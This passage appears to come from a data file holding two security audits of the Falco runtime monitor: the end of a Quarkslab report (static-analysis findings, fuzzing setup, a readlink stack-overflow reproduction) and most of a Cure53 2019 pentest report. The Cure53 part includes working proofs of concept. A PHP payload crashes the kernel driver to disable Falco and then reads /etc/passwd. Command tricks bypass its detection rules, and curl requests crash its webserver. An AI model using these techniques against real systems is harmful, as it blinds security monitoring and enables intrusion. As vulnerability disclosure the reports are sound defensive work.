Null\nDereference \u25c1arrowhookleft\u2192\npointer `fdtable `last assigned on line 1474 could be null and is dereferenced at line 1482, column 15.\n1480. eparams.m_ts = m_inspector->m_lastevent_ts;\n1481.\n1482. for(fdit = fdtable->begin(); fdit != fdtable->end(); ++fdit)\n^\n1483. {\n1484. eparams.m_fd = fdit->first;\n#70\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1434: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 1434 could be null and is dereferenced by call to `memset() `at line 1434, column 2.\n1432. int32_t uth_status = SCAP_SUCCESS;\n1433.\n1434. HASH_ADD_INT64(tinfo->fdlist, fd, fdinfo);\n^\n1435. if(uth_status == SCAP_SUCCESS)\n1436. {\n#71\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1434: error: Null Dereference\npointer `tinfo->fdlist->hh.tbl `last assigned on line 1434 could be null and is dereferenced by call to `memset() `at line 1434,\ncolumn 2. \u25c1arrowhookleft\u2192\n1432. int32_t uth_status = SCAP_SUCCESS;\n1433.\n1434. HASH_ADD_INT64(tinfo->fdlist, fd, fdinfo);\n^\n1435. if(uth_status == SCAP_SUCCESS)\n1436. {\n#74\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1501: error: Null Dereference\npointer `stid `last assigned on line 1500 could be null and is dereferenced at line 1501, column 3.\n1499. {\n1500. stid = (scap_tid *) malloc(sizeof(scap_tid));\n1501. stid->tid = tid;\n^\n1502. int32_t uth_status = SCAP_SUCCESS;\n1503.\n#78\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1696: error: Resource Leak\nresource acquired by call to `opendir() `at line 1660, column 15 is not released after line 1696, column 9.\n1694. if((*procinfo_p)->n_entries == (*procinfo_p)->max_entries)\n1695. {\n1696. if(!scap_alloc_proclist_info(procinfo_p, (*procinfo_p)->n_entries + 256, lasterr))\n^\n1697. {\n1698. goto error;\n#79\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libsinsp/threadinfo.cpp:1686: error: Null\nDereference \u25c1arrowhookleft\u2192\npointer `proclist_dumper `last assigned on line 1640 could be null and is dereferenced by call to `scap_write_proclist_end() `at\nline 1686, column 5. \u25c1arrowhookleft\u2192\n1684. });\n1685.\n1686. if(scap_write_proclist_end(m_inspector->m_h, dumper, proclist_dumper, totlen) != SCAP_SUCCESS)\n^\n1687. {\n1688. throw sinsp_exception(scap_getlasterr(m_inspector->m_h));\n#80\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap.c:1662: error: Null Dereference\npointer `handle->m_suppressed_comms `last assigned on line 1659 could be null and is dereferenced at line 1662, column 2.\n1660. handle->m_num_suppressed_comms * sizeof(char *));\n1661.\n1662. handle->m_suppressed_comms[handle->m_num_suppressed_comms-1] = strdup(comm);\n^\n1663.\n1664. return SCAP_SUCCESS;\n#87\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1812: error: Null Dereference\npointer `_he_new_buckets `last assigned on line 1812 could be null and is dereferenced by call to `memset() `at line 1812, column 4.\nRef: 23-01-1097-LIV 52 Quarkslab SAS1810. {\n1811. int32_t uth_status = SCAP_SUCCESS;\n1812. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1813. if(uth_status != SCAP_SUCCESS)\n1814. {\n#88\nfalcosecurity-libs-repo/falcosecurity-libs-prefix/src/falcosecurity-libs/userspace/libscap/scap_procs.c:1812: error: Null Dereference\npointer `handle->m_proclist.m_proclist->hh.tbl `last assigned on line 1812 could be null and is dereferenced by call to `memset() `\nat line 1812, column 4. \u25c1arrowhookleft\u2192\n1810. {\n1811. int32_t uth_status = SCAP_SUCCESS;\n1812. HASH_ADD_INT64(handle->m_proclist.m_proclist, tid, tinfo);\n^\n1813. if(uth_status != SCAP_SUCCESS)\n1814. {\nRef: 23-01-1097-LIV 53 Quarkslab SASAppendix C\nScan-Build experimentations\nFirst, Scan-Build was ran with no specific options like that, on the falco repository using the\nUSE_BUNDLED_DEPS=ON option:\nscan-build make -j 32\nIt found 595 bugs, all being on Falco\u2019s third-party dependencies, none on Falco\u2019s libs or direct\nsource code.\nIt was retried, adding more checkers with the following command:\nscan-build -enable-checker unix,nullability,core,cplusplus,security make -j 32\nThis scan found 2491 bugs, again all out of Falco\u2019s scope.\nThis was a bit suspicious so we then realized that the analyze \u201cfake compiler\u201d of scan-build was\nonly used on the dependencies and not on Falco\u2019s libs and source code, explaining why it was not\nfinding anything on this code.\nSo we tried to force the use of this \u201ccompiler\u201d for the code using (the path is just copy-pasted\nfrom the Scan-Build lines of compilation, we could have simplify the ../):\ncmake -DUSE_BUNDLED_DEPS=ON\n-DCMAKE_C_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/ccc-analyzer\n-DCMAKE_CXX_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/c++-analyzer\n..\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nUnfortunately, it\u2019s possible to run the analyzer like this but it will not generate the report, only\nthe warning during the compilation process. It would have been useful because we could have\ncompiled only the source code we are interested in with the static analyzer.\nHowever, Scan-Build has an --exclude flag, that could be used to exclude the source code of\ndependencies. We tried adding these flags:\nRef: 23-01-1097-LIV 54 Quarkslab SAS--exclude b64-prefix --exclude c-ares-prefix --exclude catch2-prefix --exclude\ncloudtrail-plugin-prefix --exclude cloudtrail-rules-prefix --exclude\ncpp-httplib-prefix --exclude curl-prefix --exclude cxxopts-prefix --exclude\nfakeit-prefix --exclude grpc-prefix --exclude jq-prefix --exclude\njson-plugin-prefix --exclude k8saudit-plugin-prefix --exclude\nk8saudit-rules-prefix --exclude njson-prefix --exclude openssl-prefix\n--exclude protobuf-prefix --exclude re2-prefix --exclude\nstring-view-lite-prefix --exclude tbb-prefix --exclude valijson-prefix\n--exclude yamlcpp-prefix --exclude zlib-prefix\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\n\u25c1arrowhookleft\u2192\nRef: 23-01-1097-LIV 55 Quarkslab SASAppendix D\nExploiting and debugging readlink issues\nThe examples are quick scripts to exploit and debug and could be improved globally. For example,\nthe following one is a snippet on how to create a long root folder and chroot into it with a bash\nprocess.\nexport NEW_ROOT= $(python3 -c \"print( 'a'*200 + '/'+'a'*200 + '/'+'a'*200 + '/'\n+'a'*200+ '/'+'a'*200+ '/'+'a'*200)\" ) \u25c1arrowhookleft\u2192\nmkdir -p $NEW_ROOT\nmkdir $NEW_ROOT/lib\nmkdir $NEW_ROOT/lib64\nmkdir $NEW_ROOT/bin\nsudo mount -B /lib $NEW_ROOT/lib\nsudo mount -B /lib64 $NEW_ROOT/lib64\nsudo mount -B /bin $NEW_ROOT/bin\nsudo chroot $NEW_ROOT /bin/bash\necho $$\n## NOTE; you will have to `sudo umount lib lib64 and bin `before `rm`the folders\nNote\nYou don\u2019t need to be root to chroot, you can use usernamespace to gain that\nprivilege with unshare -r bash -c \u2019chroot root /folder\u2019 .\nThen start Falco with GDB to see the issue in the program\u2019s memory.\nsudo gdb ./userspace/falco/falco\nb scap_proc_fill_root\nr -c ../falco.yaml -r ../rules/falco_rules.yaml\n#`return SCAP_SUCCESS; `was on line 560 of the source\n# make sure to change the PID returned by the chrooted bash with echo $$\nbreak 560 ifstrcmp(procdirname, \"/proc/783385/\") == 0\nr -c ../falco.yaml -r ../rules/falco_rules.yaml\n# you can see that the structure with\np *tinfo\n# but still the last char on the string array is not \\0, it 's an 'a'\nprint tinfo->root[sizeof(tinfo->root)-1]\n# with the following command you can see the end of the string array on the\n# fourth line, and the rest of the element that starts on the lasts lines (some\n# values are at zero so we cannot distinguish them for alignments zeros)\nx/128x tinfo->root+1000\nThe following listing is a minimal example to reproduce the issue.\nRef: 23-01-1097-LIV 56 Quarkslab SAS#include <unistd.h>\n#include <stdio.h>\n#define SCAP_MAX_PATH_SIZE 10\ntypedef struct scap_threadinfo\n{\ncharroot[SCAP_MAX_PATH_SIZE + 1]\n} scap_threadinfo;\nstatic int scap_proc_fill_root( struct scap_threadinfo *tinfo, const char\n*procdirname) \u25c1arrowhookleft\u2192\n{\nif(readlink(procdirname, tinfo->root, sizeof(tinfo->root)) > 0)\n{\nprintf(\"success: %s \\n\", tinfo->root);\nreturn0;\n}\nelse\n{\nprintf(\"fail \\n\");\nreturn-1;\n}\n}\nintmain()\n{\nscap_threadinfo tinfo;\nreturnscap_proc_fill_root(&tinfo, \"input\");\n}\nExecute like that, in the same folder:\ntouch aaaaaaaaaaaaaaaaaaaaaa\nln -s aaaaaaaaaaaaaaaaaaaaaa input\ncc test.c -fsanitize=address -o test\n./test\nYou will get an ASAN report for a stack buffer overflow in this situation.\nRef: 23-01-1097-LIV 57 Quarkslab SASAppendix E\nAFL++ persistent mode boilerplate\nOn top of the Listing 1, you will need to add this kind of code to do persistent mode fuzzing with\nAFL++:\n#include <unistd.h>\n__AFL_FUZZ_INIT();\nintmain()\n{\n#ifdef __AFL_HAVE_MANUAL_CONTROL\n__AFL_INIT();\n#endif\nunsigned char * buf = __AFL_FUZZ_TESTCASE_BUF;\nwhile(__AFL_LOOP(10000))\n{\nintlen = __AFL_FUZZ_TESTCASE_LEN;\nLLVMFuzzerTestOneInput(buf, len);\n}\nreturn0;\n}\nYou will then need to compile with the AFL++ instrumentation using, for example:\ncmake -DUSE_BUNDLED_DEPS=ON -DCMAKE_C_COMPILER=afl-gcc-fast\n-DCMAKE_CXX_COMPILER=afl-g++-fast .. \u25c1arrowhookleft\u2192\nRef: 23-01-1097-LIV 58 Quarkslab SASAppendix F\nFuzzing with libprotobuf-mutator\nsyntax= \"proto3\";\npackage sys_open ;\nmessage event_args {\nuint64fd = 1;\nstringfspath = 2;\nrepeated FILE_FLAGS flags32 = 3;\nFILE_MODE mode = 4;\nuint32dev = 5;\nuint64ino = 6;\n}\nenumFILE_FLAGS {\nFUZZ_O_NONE = 0;\nFUZZ_O_RDONLY = 1;\nFUZZ_O_WRONLY = 2;\nFUZZ_O_RDWR = 3;\nFUZZ_O_CREAT = 4;\nFUZZ_O_APPEND = 8;\nFUZZ_O_DSYNC = 16;\nFUZZ_O_EXCL = 32;\nFUZZ_O_NONBLOCK = 64;\nFUZZ_O_SYNC = 128;\nFUZZ_O_TRUNC = 256;\nFUZZ_O_DIRECT = 512;\nFUZZ_O_DIRECTORY = 1024;\nFUZZ_O_LARGEFILE = 2048;\nFUZZ_O_CLOEXEC = 4096;\nFUZZ_O_TMPFILE = 8192;\n}\nenumFILE_MODE {\nFUZZ_S_NONE = 0;\nFUZZ_S_IXOTH = 1;\nFUZZ_S_IWOTH = 2;\nFUZZ_S_IROTH = 4;\nFUZZ_S_IXGRP = 8;\nFUZZ_S_IWGRP = 16;\nFUZZ_S_IRGRP = 32;\nFUZZ_S_IXUSR = 64;\nFUZZ_S_IWUSR = 128;\nFUZZ_S_IRUSR = 256;\nFUZZ_S_ISVTX = 512;\nRef: 23-01-1097-LIV 59 Quarkslab SASFUZZ_S_ISGID = 1024;\nFUZZ_S_ISUID = 2048;\n}\nRef: 23-01-1097-LIV 60 Quarkslab SAS" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Falco", - "file_name": "SECURITY_AUDIT_2019_07.pdf" - }, - "content": [ - { - "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nPentest-Report Falco 06.-07.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, MSc. D. Wei\u00dfer, B. Walny,\nBSc. J. Hector, J. Larsson\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1. Manual code auditing\nPart 2. Code-assisted penetration testing\nIdentified Vulnerabilities\nFAL-01-001 Driver: Undetected crash disables Falco monitoring (Critical)\nFAL-01-002 Falco: Bypassing various rules with different techniques (High)\nFAL-01-003 Falco: HTTP request with incorrect data leads to crashes (High)\nMiscellaneous Issues\nFAL-01-004 Falco: Dependencies pulled via hard-coded HTTP links (Low)\nFAL-01-005 Falco: Security flags not enforced by Makefile (Low)\nConclusions\nIntroduction\n\u201cFalco is a behavioral activity monitor designed to detect anomalous activity in your\napplications. Powered by sysdig\u2019s system call capture infrastructure, Falco lets you\ncontinuously monitor and detect container, application, host, and network activity\u2014all in\none place\u2014from one source of data, with one set of rules.\u201d\nFrom https://github.com/falcosecurity/falco\nThis report documents a large-scale security assessment of the Falco software complex.\nCarried out by Cure53 in June 2019, this project entailed both a thorough penetration\ntest and a broader, general security audit. Notably, the targeted Falco software is a\nbehavioral activity monitor designed to detect anomalous activity in deployed\napplications. Five security-relevant discoveries, including one item marked as \u201c Critical\u201d in\nterms of severity, were made on the scope during this project.\nCure53, Berlin \u00b7 07/24/19 1/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nIt should be clarified that this Cure53 project was very extensive and actually combined\ntwo parts of investigations against two items. The first component was an analysis of the\nFalco software described here, while the second encompassed the open-source version\nof the Sysdig software. The latter is documented in a separate report. The reasoning\nbehind this bifocal approach was that the two software items are very much\ninterconnected and Falco actually makes heavy use of Sysdig. In other words,\ncapitalizing on the available resources and executing the assessments against the two\nitems in parallel was a great opportunity for reaching a much more wide-spanning,\noptimal coverage. On that note, it needs to be stated that this assessment of the security\nlevels exhibited by Falco was requested and sponsored by CNCF, while the\ncomplementary audit and pentest against Sysdig software was financed by Sysdig, Inc.\nCommenting more on the particular resources dedicated to the project, a team of six\nmembers of the Cure53 team was comprised and tasked with completing this\nassessment. The tests and audits were carried out in June and July of 2019, with\neighteen days invested into work specific to Falco, and twenty person-days spent on\nresearch and tests that targeted Sysdig. Both components were realized in a timely\nfashion and progressed efficiently. Slack was used for communications during the test\nSlack. In a dedicated channel, the Cure53, Falco and Sysdig teams could collaborate\nand exchange information about emerging issues and findings.\nZooming in on the findings from the tests against Falco, it can be noted that three\nproblems were noted as actual vulnerabilities and two as general weaknesses. Among\nthe core flaws, one vulnerability received a \u201c Critical\u201d score because it would make it\npossible for an attacker to deactivate Falco. As such, it would bypass the anomaly\ndetection by simply crashing the software. The issue is closely related to a crash found\nin Sysdig, which is documented in the corresponding report as SYS-01-003. Additionally\nof note is that two findings were deemed to carry \u201c High\u201d-level risks. These indicate more\ndetection bypasses and another crash that can be triggered via HTTP. On a positive\nnote, all other issues should be seen as quite trivial severity. Further, none of the\ndiscoveries should be overly difficult to fix. As the rule bypasses are more worrisome\nand may pose some challenges, they will be discussed in the conclusion one more time.\nIn the following sections, this report will first shed light on the scope and then furnishes\ncase-by-case descriptions of the findings, featuring both technical details (i.e. with Proof-\nof-Concept excerpts) and possible mitigations for going forward. Based on the results of\nthis summer 2019 assessment, Cure53 issues a broader verdict about the privacy and\nsecurity posture of the tested items. Conclusions pertinent to the Falco software\ncomplex, its limitations and possible improvements that should be considered in future\nreleases, are supplied in the final section of the report.\nCure53, Berlin \u00b7 07/24/19 2/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nScope\n\u2022Falco\n\u25e6https://github.com/falcosecurity/falco/releases/tag/0.15.3 \n\u25e6A Scope Doc was made available & shared between Cure53 and Sysdig, Inc.\nTest Methodology\nThe following paragraphs describe the testing methodology used during the audit of the\nFalco- and its dependent Sysdig-codebase. The test was divided into two phases, each\nfulfilling different goals. In the first phase, the focus was on manual source code reviews,\nwhich were needed for spotting insecure code patterns. Usually issues around race\nconditions, information leakage or similar flaws can be found in this context. During the\nsecond phase, it was evaluated whether the security goals and premise claimed by\nFalco can withstand real-life attack scenarios.\nPart 1. Manual code auditing\nThis section lists the steps that were undertaken during the first phase of the\nassessment targeting the Falco software compound. It describes the key aspects of the\nmanual code audit. Along with the spotted major issues, the list portrays the\nthoroughness of the audit and confirms the quality of the project.\n\u2022The provided documentation was extensively studied to obtain a good overview\nof the project and its deployment options.\n\u2022The puppet module was audited for problems in relation to the instrumentation of\nFalco. No issues were detected.\n\u2022The parser-aspect of the user-space engine, along with the rule-loader, were\ntreated with extra scrutiny, yet no weaknesses were noted.\n\u2022program_output was closely investigated but the pipe to the supplied executable\nby popen does not allow for cmdline injection.\n\u2022The entire codebase was checked for C-style string functionality. While format\nstring potential was identified, none of it has been deemed exploitable.\n\u2022The webserver implementation was investigated for typical problems, in\nparticular the handler-aspects. No exploitable scenarios were found.\n\u2022Overall usage of functions akin to mg_send_http_error and mg_printf has been\naudited with no vulnerabilities spotted.\n\u2022The entire codebase was checked for proper usage of format strings, especially\nthe application of substrings. No security-related issues were filed.\n\u2022The C++ code was audited for language-typical misapplication like direct object\nreferences leading to use-after-free, as well as dangling c_str-pointers.\nCure53, Berlin \u00b7 07/24/19 3/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n\u2022The parts of the webserver dealing with JSON parsing were audited but none of\nthe typically found problems seem to weaken the codebase.\n\u2022Memory management functions like malloc, realloc and memcpy were\ninvestigated for inappropriate application but found to be correct.\n\u2022The dependency build-scripts were audited. The fact that HTTP links are used\nwith hard-coded version numbers resulted in the recommendation for FAL-01-\n004.\nPart 2. Code-assisted penetration testing\nThe following list documents the distinguishable steps taken during the second part of\nthe test. A code-assisted penetration test was executed against a locally deployed\nKubernetes-cluster configured by the testing team, running both Falco and Sysdig. This\nadditional approach was used to ensure maximum coverage of the originally defined\nattack surface.\n\u2022Falco and Sysdig were installed in a remote Minikube-cluster, emulating a full\nKubernetes-cluster with helm, tiller and additional services.\n\u2022A DVWA-pod was installed as a test service to evaluate the default ruleset\ndeployed by Falco in a potentially compromised environment.\n\u2022The TLS/SSL setup inside the Kubernetes-cluster was checked for correct\nconfiguration. Session establishment and event retrieval were deemed secure.\n\u2022Falco was deployed with a DaemonSet, optionally including RBAC. A resource\ndepletion problem within Minikube was identified.\n\u2022Falco configuration options were verified, http_output uses curl with proper\nsettings; SSRF would not work even in a Man-in-the-Middle scenario.\n\u2022A HTTP-fuzzer was deployed against the webserver but no reproducible crashes\ncould be provoked with this approach.\n\u2022Dozens of default filter-rules were audited in detail. A collection of problems was\nidentified, eventually leading to the filing of FAL-01-002.\nCure53, Berlin \u00b7 07/24/19 4/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. FAL-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nFAL-01-001 Driver: Undetected crash disables Falco monitoring (Critical)\nIt was discovered that the kernel module crash found in Sysdig ( SYS-01-003) is not\ndetected by the Falco application. This means that Falco is unaware that the module has\ncrashed and no longer receives system call events. SYS-01-003 can be triggered from\nan unprivileged process and within a container, which allows a malicious entity to\neffectively disable the monitoring system and perform any desired action without Falco\nbeing notified.\nWhat follows is a Proof-of-Concept (PoC) that assumes an attacker who manages PHP\ncode execution in a vulnerable web application.\nPoC. PHP Code execution with ngnix:\n<?php\nif(glob(\"/etc/falco/*\")){echo \"[x] Falco installed\\n\";\n$poc1 = \"int main(){syscall(19, 0xffffffffffffffff, 0xffffffffffffffff, \n0xffffbc1000000000, 0x5633fff478f1);return 0;}\";\n$poc2 = \"int main(){char buf[4096] = {0x41};syscall(19, 0xffffffffffffffff, \n&buf, 0x80000001, 0x5633fff478f1);return 0;}\";\nfile_put_contents(\"/tmp/b.c\", $poc2);\n$bypass = \"/usr/sbin/nginx -c /etc/nginx/nginx.conf\";\nsystem(\"PATH=/usr/local/bin:/usr/bin:/bin /usr/bin/gcc /tmp/b.c -o /tmp/crash &&\n/tmp/crash\" . \";#$bypass\");\necho \"[x] Falco disabled\\n\";\nsystem(\"ls -la; cat /etc/passwd; whoami; id;\");\n}else{echo \"[x] Falco not found\\n\";}\n?>\nA simple check is performed to ensure Falco is installed. Next, the PoC C-sourcecode\nfrom SYS-01-003 is written to a file, compiled and executed. Note that here an additional\nbypass, explained in FAL-01-002, is used to ensure that the compile command is not\nregistered by Falco.\nIn the above PoC, two different payloads can be used to execute the system call. The\ndifference is that poc1 contains an invalid user-space address (second syscall\nCure53, Berlin \u00b7 07/24/19 5/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nparameter) and a larger third parameter. This disables the monitoring as well, although\nthe root cause is not clear. Surprisingly, poc1 does not crash the kernel module when\none just looks at Sysdig. This needs further investigation as some sort of discrepancy\nexists when it comes to running Sysdig as a standalone versus running it as bundled\nwith Falco.\nIt is recommended to implement a mechanism that detects if the kernel module is\nactually running or not; an immediate detection of a crash would ideally re-initialize the\nmodule.\nFAL-01-002 Falco: Bypassing various rules with different techniques (High)\nA set of default macros and rules is provided inside falco_rules.yaml. During the audit,\nmultiple ways to bypass said rules were discovered. An array of methods ensues.\nBypassing path-based checks with / proc/self/root\nMost file-related rules implement their checks based on the fd.name and fd.directory\nparameters. Oftentimes, it is assumed that the paths are absolute, i.e. \u201c startswith /some/\npath\u201d. With operating system-level symlinks, such as /proc/self/root/ which links back to\n\u201c/\u201d, all of the rules may be bypassed. This is because all paths can be accessed via\n\u201c/proc/self/root/some/path \u201d in this case.\nBypassing cmdline-based checks with subcommands\nAcross various places, proc.cmdline is used to determine if certain strings are present or\nnot and this is done to detect malicious behavior. One example is the macro called\nparent_scripting_running_builds . Cure53 discovered that the checks can be bypassed\nwith the use of subcommands. The existing rules were modified to rely on the above-\nmentioned macro to demonstrate the issue in the following Proof-of-Concept (PoC).\nPoC:\n$ # Detected command:\n$ php -r 'system(\"git --version\");'\n$ # Undetected command\n$ php -r 'system(\" $(echo \\\"git --version\\\") \");'\nResulting cmdline:\n# Detected command\ncommand=sh -c git --version\n# Undetected command\ncommand=sh -c $(echo \"git --version\")\nCure53, Berlin \u00b7 07/24/19 6/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nFalco tries to detect if \u201c sh -c git\u201d is called by checking whether the cmdline starts with\nthat particular string. As demonstrated above, this is no longer the case subcommands\nare in play.\nVarious other methods leading to bypasses\nAlthough the first two bypasses already circumvent a substantial number of rules, both\nless general and more specific bypasses for the remaining rules were also found.\nThe rules solely checking if files get opened for writing, such as Update Package\nRepository, can be evaded by writing a file into /tmp/ for instance and then moving it\nafterwards to the new location. Same applies to the Create Hidden Files or Directories\nrules which can be approached with renaming of the created folder/file.\nSome rules were found to be overly specific in their conditions. Set Setuid or Setgid bit,\nfor instance, checks only if chmod is called with the exact params of \u201c +s\u201d or \u201c4777\u201d, thus\npassing \u201c0477\u201d or \u201c6777\u201d unnoticed. The same pattern can be observed for the rules\nwhich monitor only specific binaries for certain actions. The discrepancy is, for example,\nbetween Delete Bash History . \u201cshred, rm, mv\u201d which are being checked and binaries -\nsuch as unlink - which are not handled in the same way and remain unchecked.\nFinally, rules were found to be too broad in their definitions. Macros such as\nnginx_starting_nginx check if a cmdline contains a certain substring. This can be trivially\nbypassed, for example by adding a comment to the end of the malicious cmdline,\nsimulating a normal action. The PoC in FAL-01-001 demonstrates this.\nConsidering all these different means of bypassing the rules, it becomes quite clear that\nwriting a bullet-proof ruleset is a strenuous challenge. It is recommended to rethink the\ncurrent approach of handling filter-rules and, possibly, redefine the scope and\nfunctionality of this item.\nFAL-01-003 Falco: HTTP request with incorrect data leads to crashes (High)\nIt was discovered that the Falco webserver can be crashed by sending a request with\nmalformed JSON data. This allows attackers with local access or SSRF capabilities to\ndisable surveillance in its entirety. However, this issue requires the attacked environment\nto have access to the webserver\u2019s port. In a properly containerized setup this is not the\ncase. The following PoC demonstrates how a simple request leads to a crash in Falco.\nPoC:\ncurl http://127.0.0.1:8765/k8s_audit --data ' {\"kind\":0}' -H \"Content-Type: \napplication/json\"\nCure53, Berlin \u00b7 07/24/19 7/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nFalco Crash:\nroot@sysdigtest:/tmp# falco\n[...]\nWed Jun 26 13:07:13 2019: Starting internal webserver, listening on port 8765\nterminate called after throwing an instance of 'nlohmann::detail::type_error'\n what(): [json.exception.type_error.302] type must be string, but is number\nAborted\nAs the error states, the problem is caused by an integer value where a string is actually\nexpected for the comparison. This can be seen in the following piece of code.\nAffected File:\n/userspace/engine/falco_engine.cpp\nAffected Code:\nbool falco_engine::parse_k8s_audit_json(nlohmann::json &j, std::list<json_event>\n&evts)\n{\nif(j.value(\"kind\", \"<NA>\") == \"EventList\" )\nFurthermore, it was discovered that not just application-specific payloads can be used to\ncrash the server but this can also be accomplished with malformed JSON strings. This\ncan be seen in the PoC request below.\nPoC:\ncurl http://127.0.0.1:1337/k8s_audit --data '5E5555' -H \"Content-Type: \napplication/json\"\nFalco Crash:\nterminate called after throwing an instance of 'nlohmann::detail::out_of_range'\n what(): [json.exception.out_of_range.406] number overflow parsing '5E5555'\nAborted\nExceptions that may occur while handling user-provided data should not be fatal to the\nintegrity of the application. It is recommended to ignore the malformed request rather\nthan react with a termination of the application.\nCure53, Berlin \u00b7 07/24/19 8/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nFAL-01-004 Falco: Dependencies pulled via hard-coded HTTP links (Low)\nApart from auditing the source code of the Falco application, the build scripts were\nanalyzed as well. It was noticed that some dependencies in the CMake-files are\ndownloaded via hard-coded HTTP links. The following contents of the CMakeLists.txt\nserve as an example.\nAffected File:\nCMakeLists.txt\nAffected Code (an example):\nelse()\n set(ZLIB_SRC \"${PROJECT_BINARY_DIR}/zlib-prefix/src/zlib\")\n message(STATUS \"Using bundled zlib in '${ZLIB_SRC}'\")\n set(ZLIB_INCLUDE \"${ZLIB_SRC}\")\n set(ZLIB_LIB \"${ZLIB_SRC}/libz.a\")\n ExternalProject_Add(zlib\n# START CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, \nCVE-2016-9843\nURL \n\"http://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.11.tar.gz\"\nBecause the download happens via a clear-text connection, any attackers with Man-in-\nthe-Middle capabilities (for example after a successful intrusion into internal network\noccurred) can easily spoof the connection to download malicious executables instead. It\nis therefore recommended to replace all HTTP links with their HTTPS equivalents. In\naddition to that, it is also recommended to cease hardcoding of the version numbers (like\nzlib-1.2.11.tar.gz in the example above). Instead, referral should always be to the -latest\npackage from the official vendor. This offers slightly stronger guarantees that the latest\nsoftware version is always used.\nCure53, Berlin \u00b7 07/24/19 9/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nFAL-01-005 Falco: Security flags not enforced by Makefile (Low)\nOne of the realms reviewed during almost every security test of a new project\nencompasses studying the presence of hardening flags applied when the software is\nbuilt. This can be done with tools like checksec1 or PEDA2 once the software has been\ncompiled with the default options inside the Makefile at hand.\nSysdig Security Flags:\n# gdb /usr/bin/sysdig\ngdb-peda$ checksec\nCANARY : ENABLED\nFORTIFY : disabled\nNX : ENABLED\nPIE : disabled\nRELRO : disabled\nFrom the GDB\u2019s output, it is apparent that the hardening flags are derived from the\nglobal Linux distribution setting rather than forced from the CMakeLists.txt itself. From\nthis follows that certain hardening checks are missing. These include\nFORTIFY_SOURCE.\nAlthough modern compilers enable those settings by default, it is important to set the\nnecessary CFLAGS/CXXFLAGS inside the CMakeLists.txt itself. This should be done in\norder to directly instruct the compiler to insert all of the security flags required. Once\nactivated, the exploitation of multiple kinds of memory corruption vulnerabilities becomes\nmuch more difficult. This increase in security comes from two reasons: one having to do\nwith requiring additional information leaks from the program\u2019s memory, and the other\nrevolving around establishing that the problems are mitigated by newly introduced length\nchecks.\nThe following snippet shows what CFLAGS/CXXFLAGS are recommended as an\naddition to the CMakeLists.txt file.\nSecurity Flags:\nset(CMAKE_POSITION_INDEPENDENT_CODE ON)\nset(SYSDIG_SECURITY_FLAGS \" -Wl,-z,relro,-z,now -pie -fPIE -fstack-protector-all \n-D_FORTIFY_SOURCE=2 \")\nset(CMAKE_C_FLAGS \"${CMAKE_C_FLAGS} ${SYSDIG_SECURITY_FLAGS}\")\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} ${SYSDIG_SECURITY_FLAGS}\")\nWith these settings enabled, checksec should yield the following output:\n1 http://www.trapkit.de/tools/checksec.html2 https://github.com/longld/peda\nCure53, Berlin \u00b7 07/24/19 10/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 